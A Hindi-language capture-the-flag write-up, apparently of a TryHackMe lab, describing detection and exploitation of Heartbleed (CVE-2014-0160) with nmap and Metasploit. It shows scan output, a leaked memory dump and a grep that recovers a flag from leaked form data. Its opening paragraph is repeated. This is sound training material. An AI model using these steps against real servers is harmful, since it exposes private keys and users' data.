
इस परियोजना का उद्देश्य Heartbleed भेद्यता (CVE-2014-0160) के लिए एक दूरस्थ होस्ट का आकलन करना, इसकी उपस्थिति की पुष्टि करना, और TLS प्रोटोकॉल के माध्यम से सर्वर मेमोरी से संभावित संवेदनशील जानकारी निकालने के लिए इसका शोषण करना था।
उद्देश्य इस परियोजना का उद्देश्य किसी दूरस्थ होस्ट पर Heartbleed भेद्यता (CVE-2014-0160) का आकलन करना, इसकी उपस्थिति की पुष्टि करना, और TLS प्रोटोकॉल के माध्यम से सर्वर मेमोरी से संभावित संवेदनशील जानकारी निकालने के लिए इसका शोषण करना था।
निष्पादन
plaintext PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4 111/tcp open rpcbind 2-4 443/tcp open ssl/http nginx 1.15.7
| ssl-cert: Subject: CN=localhost/O=TryHackMe/ST=London/C=UK | Not valid before: 2019-02-16T10:41:14 | Not valid after: 2020-02-16T10:41:14 TLS प्रमाणपत्र स्व-हस्ताक्षरित और समाप्त था। इससे संदेह उत्पन्न हुआ कि OpenSSL संस्करण पुराना हो सकता है। लक्ष्य पोर्ट: 443।
plaintext | ssl-heartbleed: | VULNERABLE: | OpenSSL 1.0.1 is vulnerable to Heartbleed | State: VULNERABLE | Risk factor: High | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160 लक्ष्य Heartbleed के प्रति संवेदनशील पुष्टि हुआ।
plaintext [+] Heartbeat response with leak, 44883 bytes [+] Heartbeat data stored in /root/.msf4/loot/20250627224930_default_52.215.184.158_openssl.heartble_152689.bin मेमोरी सफलतापूर्वक डंप की गई और विश्लेषण के लिए स्थानीय रूप से संग्रहीत की गई।
strings openssl.heartble_152689.bin | grep -i "THM{" परिणाम:
plaintext user_name=hacker101&user_email=[email protected]&user_message=THM{sSl-Is-BaD} गोपनीय डेटा, जिसमें एक एप्लिकेशन फ्लैग शामिल है, TLS मेमोरी से सफलतापूर्वक निकाला गया — यह पुष्टि करता है कि भेद्यता का वास्तविक रूप से शोषण करके संवेदनशील जानकारी लीक की जा सकती है।
निष्कर्ष मैंने दूरस्थ सर्वर पर CVE-2014-0160 को सफलतापूर्वक पहचाना और उसका शोषण किया। इस प्रक्रिया में शामिल थे:
nmap के साथ भेद्यता का पता लगाना
Metasploit का उपयोग करके दोष का शोषण करना
मेमोरी से लाइव उपयोगकर्ता-प्रस्तुत डेटा (फ्लैग THM{sSl-Is-BaD} सहित) निकालना
व्यावसायिक प्रभाव सार्वजनिक रूप से उजागर सिस्टम में Heartbleed की उपस्थिति एक गंभीर जोखिम उत्पन्न करती है:
TLS निजी कुंजियों का संभावित रिसाव
सत्र अपहरण
उपयोगकर्ता नाम, ईमेल और संवेदनशील उपयोगकर्ता इनपुट का उजागर होना